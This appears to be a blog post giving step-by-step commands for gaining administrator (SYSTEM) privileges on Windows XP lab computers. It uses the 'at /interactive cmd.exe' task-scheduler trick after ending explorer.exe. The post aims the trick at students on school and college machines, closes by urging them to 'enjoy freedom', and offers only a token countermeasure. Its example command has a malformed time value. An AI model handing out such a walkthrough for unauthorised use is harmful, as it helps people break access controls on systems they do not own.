Bookmark and Share BitCoin Donate: 13t8gAWVpHP2ddxMp88d1NFpZjnFJC6UwK

Priviledge escalation in Windows XP up to SP 3

(Works only on Windows XP)
Most of you may have alreadyseen a student of your college or school performing this hack on lab computer. Students generally don't have Administration privileges on lab computers to copy or install applications where they use this hack to gain some real stuff done on PC.

Vulnerability:
Windows command line task scheduler supports interactive mode which works somewhat same as sudo -i or su -i command in Linux/UNIX the only problem is that it does not ask you for password. This vulnerability is patched up in further versions of Windows than XP and works fine even in XP-3.

Procedure:
Open command prompt and type

c:>time

and note the time, time will be presented in 24 hour clock format. Note this time.
Now open “Task Manager” by typing
“c:>taskmgr”
now from processes and end explorer.exe .

Now type,

c:>at (time displayed in 24 hour clock format)+2 minutes /interactive cmd.exe
for example
---
c:>time
The current time is: 0:27:11.68
Enter the new time:
c:>taskmgr
c:>at 0:29:00:00 /interactive cmd.exe
--
Now type c:>exit
and wait for two minutes. After two minutes command prompt will open in interactive mode with all administrative privileges without asking you for password. Now run any command from it it'll run with full administrative privileges so that you can even install programs and applications in system. So type “explorer.exe” in cmd and use system with administrative privilege even when you are in guest account.

Countermeasure: Disable command prompt for guest account.

By the way no college can ever disable command prompt because practicals are done over it, so guys get your stance and enjoy freedom.

 

Source